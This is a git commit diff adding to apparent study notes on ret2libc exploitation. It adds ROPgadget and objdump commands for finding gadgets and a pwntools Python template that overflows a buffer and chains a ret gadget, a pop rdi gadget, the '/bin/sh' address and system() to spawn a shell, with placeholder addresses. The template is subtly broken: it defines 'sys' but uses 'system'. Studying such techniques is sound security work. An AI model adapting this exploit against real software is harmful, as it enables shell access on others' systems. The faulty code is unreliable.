ret2libc addition
parent
b0e1d1a276
commit
0caf7edbf6
@ -41,7 +41,42 @@ readelf -s /lib32/libc.so.6 | grep system
|
||||||
* Architecture
|
* Architecture
|
||||||
* Calling convention
|
* Calling convention
|
||||||
|
|
||||||
## Usage
|
### Manually
|
||||||
|
|
||||||
|
```sh
|
||||||
|
ROPgadget --binary <file> | grep rdi
|
||||||
|
```
|
||||||
|
* Find `ret`s, to put in front of rdi
|
||||||
|
```sh
|
||||||
|
objdump -d <file> | grep ret
|
||||||
|
```
|
||||||
|
|
||||||
|
## Example without ASLR
|
||||||
|
```python
|
||||||
|
from pwn import *
|
||||||
|
|
||||||
|
p = process('<binary>')
|
||||||
|
|
||||||
|
cbase = 0x<libc_base>
|
||||||
|
sys = cbase + <libc_system>
|
||||||
|
sh = cbase + <libc_shell>
|
||||||
|
rop_rdi = <found rop rdi>
|
||||||
|
rop_ret = <found rop ret>
|
||||||
|
|
||||||
|
payload = b'A' * <count>
|
||||||
|
payload += b'B' * 8
|
||||||
|
payload += p64(rop_ret)
|
||||||
|
payload += p64(rop_rdi)
|
||||||
|
payload += p64(sh)
|
||||||
|
payload += p64(system)
|
||||||
|
payload += p64(0x0) # end payload
|
||||||
|
|
||||||
|
p.recv()
|
||||||
|
p.sendline(payload)
|
||||||
|
p.interactive()
|
||||||
|
```
|
||||||
|
|
||||||
|
## Example with ASLR
|
||||||
* Create context
|
* Create context
|
||||||
```python
|
```python
|
||||||
#!/usr/bin/env python3
|
#!/usr/bin/env python3
|
||||||
|
|